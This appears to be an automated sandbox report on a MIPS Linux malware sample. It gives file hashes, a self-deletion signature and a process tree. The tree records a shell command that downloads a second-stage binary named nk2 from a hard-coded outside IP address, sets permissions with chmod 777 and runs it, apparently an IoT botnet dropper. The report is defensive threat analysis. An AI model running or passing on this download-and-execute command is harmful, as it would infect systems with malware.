Analysis

  • max time kernel
    7s
  • max time network
    0s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20231221-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20231221-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    13/02/2024, 02:37

General

  • Target

    681429df8e9cb3908033632d832fbb5542f72b391b714fd241a167af6d3c2c29.elf

  • Size

    12KB

  • MD5

    79fa7829d645bd9333c3ea02772b5ce1

  • SHA1

    e7e587543b8520dd8b8fcd4452d8002f52fad330

  • SHA256

    681429df8e9cb3908033632d832fbb5542f72b391b714fd241a167af6d3c2c29

  • SHA512

    78849fa3c534bea8ee7ca68280ae0daa800307f3becc94d5fbb90d1dda7d62ea323a9e36861da284bd93785c3bdb00f64dff31d49dfb3839de57116be6824b94

  • SSDEEP

    384:BCcMSz+diEZg1Ut5zCK6T9z6xd/QOHfHo:gTS6cET6K6T9OUOvo

Score
7/10

Malware Config

Signatures

  • Deletes itself (1 IoC)

Processes

  • /tmp/681429df8e9cb3908033632d832fbb5542f72b391b714fd241a167af6d3c2c29.elf (PID 717, depth 1)
    command: /tmp/681429df8e9cb3908033632d832fbb5542f72b391b714fd241a167af6d3c2c29.elf
    signature: Deletes itself
    • /bin/sh (PID 763, depth 2)
      command: sh -c "wget http://198.98.51.91/abdagoodamagalu/nk2; chmod 777 *; ./nk2 wget.echo.telnet.mips"
      • /usr/bin/wget (PID 764, depth 3)
        command: wget http://198.98.51.91/abdagoodamagalu/nk2
      • /bin/chmod (PID 768, depth 3)
        command: chmod 777 systemd-private-7125d7b327a440bd854efe7e0189b918-systemd-timedated.service-Zr8NHm
      • /tmp/nk2 (PID 769, depth 3)
        command: ./nk2 wget.echo.telnet.mips

Network

MITRE ATT&CK Matrix
